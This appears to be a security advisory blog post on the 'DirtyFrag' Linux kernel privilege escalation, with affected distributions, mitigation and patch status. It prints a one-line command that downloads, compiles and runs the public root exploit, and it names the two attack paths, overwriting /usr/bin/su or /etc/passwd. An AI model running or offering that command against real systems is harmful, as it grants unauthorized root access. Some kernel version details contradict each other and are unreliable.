DirtyFrag — Universal Linux LPE

Two chained kernel bugs enable deterministic privilege escalation on all major Linux distributions

May 8, 2026 · Updated: May 13, 2026 · CVE-2026-43284 / CVE-2026-43500 · Security · Linux · Kernel

Critical — Patches Partially Available

DirtyFrag allows a local unprivileged attacker to obtain full root privileges. Officially assigned as CVE-2026-43284 (ESP/xfrm, CVSS 8.8) and CVE-2026-43500 (RxRPC, CVSS 7.8). Debian and RHEL/AlmaLinux have released patches for CVE-2026-43284. CVE-2026-43500 remains unpatched on most distributions.

Update — May 13, 2026

DirtyFrag has been assigned official CVE numbers: CVE-2026-43284 (xfrm/ESP, CVSS 8.8) and CVE-2026-43500 (RxRPC, CVSS 7.8). Debian (Bookworm 6.1.170-3 and Trixie 6.12.86-1) and RHEL 8/9/10 have released kernel patches for CVE-2026-43284. CVE-2026-43500 remains unpatched on most distros. Patch status table and distro blocks updated.

On May 7, 2026, a new Linux vulnerability was disclosed on the oss-security mailing list: DirtyFrag. The name describes the mechanism — fragmented, dirty page-cache writes. Unlike many kernel exploits, DirtyFrag is deterministic, requires no timing window, and does not cause kernel panics.

Successfully tested on Ubuntu 24.04.4, RHEL 10.1, openSUSE Tumbleweed, CentOS Stream 10, AlmaLinux 10, and Fedora 44.

Background

DirtyFrag chains two independent kernel bugs in the page cache, both providing controlled write access to arbitrary files:

Bug 1 — xfrm-ESP Page-Cache Write (since 2017)

Commit cac2661c53f3 (2017) introduced a vulnerability in the IPsec subsystem (xfrm). The ESP4/ESP6 module writes uncontrollably into the page cache when processing network packets. This path requires namespace creation privileges (unprivileged by default on most distros).

Bug 2 — RxRPC Page-Cache Write (since 2023)

Commit 2dc334f1a63a (June 2023) introduced a similar bug in the RxRPC/RxKAD protocol module. This path is even broader — it requires no namespace privileges at all.

Technical Core

Both bugs allow an arbitrary 4-byte write into the Linux page cache — targeting any file the attacker can read. This is sufficient for two attack paths: overwriting /usr/bin/su with shellcode, or injecting a passwordless root entry into /etc/passwd.

Exploit Chain

since 2017

xfrm-ESP Bug

4-byte page-cache write via IPsec/ESP
Requires: namespace privileges

since 2023

RxRPC Bug

4-byte page-cache write via RxRPC
Requires: no special privileges

→

Result

Root

Deterministic, no timing window, no kernel panic

The PoC compiles in a single line:

git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

Note

The PoC is publicly available. Any local user on an unpatched system — e.g. in shared hosting, on a CI runner, or after an initial compromise — can obtain root.

Am I affected?

All systems running Linux kernel ≥ 4.14 (xfrm-ESP, 2017) or ≥ 6.4 (RxRPC, 2023) are potentially affected. This covers virtually every production Linux installation.

Distribution	Kernel	ESP path	RxRPC path	Status
Ubuntu 24.04 LTS	`6.8.x`	✓	✓	Affected
Debian 12 (Bookworm)	`6.1.x`	✓	–	Patched (6.1.170-3)
Debian 13 (Trixie / Proxmox)	`6.17.x`	✓	✓	Patched (6.12.86-1)
RHEL 10.1 / AlmaLinux 10	`6.12.x`	✓	✓	ESP ✓ · RxRPC pending
openSUSE Tumbleweed	Rolling	✓	✓	Affected
Fedora 44	`6.14.x`	✓	✓	Affected

Quick check — which modules are loaded:

lsmod | grep -E 'esp4|esp6|rxrpc'

No output = modules not currently loaded, but they can be loaded on-demand at any time. The mitigation below prevents exactly that.

Immediate Mitigation (all distros)

Until a patched kernel is available, permanently block the three vulnerable modules:

# Block modules permanently
printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' \
  > /etc/modprobe.d/dirtyfrag.conf

# Unload if already loaded
rmmod esp4 esp6 rxrpc 2>/dev/null; true

# Verify — all three must fail
modprobe esp4; modprobe esp6; modprobe rxrpc

WireGuard Compatibility

WireGuard is not affected. The blocked modules (esp4, esp6, rxrpc) belong to the IPsec/xfrm subsystem and AFS protocol stack — WireGuard uses neither. WireGuard dependencies: udp_tunnel, ip6_udp_tunnel, libchacha20poly1305, curve25519.

Limitation

Systems actively using IPsec/IKEv2 VPN (e.g. strongSwan, Libreswan) will be affected by blocking esp4/esp6. WireGuard, OpenVPN, and other VPN solutions are not impacted.

Distro-specific Guide

🟠 Ubuntu 22.04 / 24.04 LTS Affected

Kernel: 5.15.x / 6.8.x

# Apply mitigation
printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' \
  | sudo tee /etc/modprobe.d/dirtyfrag.conf
sudo rmmod esp4 esp6 rxrpc 2>/dev/null; true

# Once patch is available — remove mitigation:
sudo rm /etc/modprobe.d/dirtyfrag.conf
sudo apt update && sudo apt upgrade -y linux-image-generic
sudo reboot

🔴 Debian 12 (Bookworm) / 13 (Trixie) Patched

Bookworm: 6.1.170-3 · Trixie: 6.12.86-1 · both CVEs patched

sudo rm -f /etc/modprobe.d/dirtyfrag.conf
sudo apt update && sudo apt dist-upgrade -y
sudo reboot

🟣 Proxmox VE Patched

Kernel: 6.17.x-pve · patched via Debian Trixie Security

sudo rm -f /etc/modprobe.d/dirtyfrag.conf
sudo apt update && sudo apt dist-upgrade -y
sudo reboot

Patch Status

As of May 13, 2026

Distribution	CVE-2026-43284 (ESP/xfrm)	CVE-2026-43500 (RxRPC)
Debian 12 (Bookworm)	6.1.170-3	6.1.170-3
Debian 13 (Trixie)	6.12.86-1	6.12.86-1
Proxmox VE	via Debian Trixie	via Debian Trixie
RHEL 8	4.18.0-553.124.1	Pending
RHEL 9	5.14.0-611.55.1	Pending
RHEL 10 / AlmaLinux / Rocky	6.12.0-124.56.1	Pending
Ubuntu 24.04 / 22.04	Pending	Pending
Fedora / openSUSE	Pending	Pending
Arch Linux	Pending	Pending
Mainline	7.1-rc3+	7.1-rc3+

CVEs Assigned Retroactively

DirtyFrag was reported under a coordinated embargo that was broken before patches were ready. CVE numbers were assigned after the fact: CVE-2026-43284 (reserved 2026-05-01, published 2026-05-08) for the xfrm/ESP bug and CVE-2026-43500 (published 2026-05-11) for the RxRPC bug.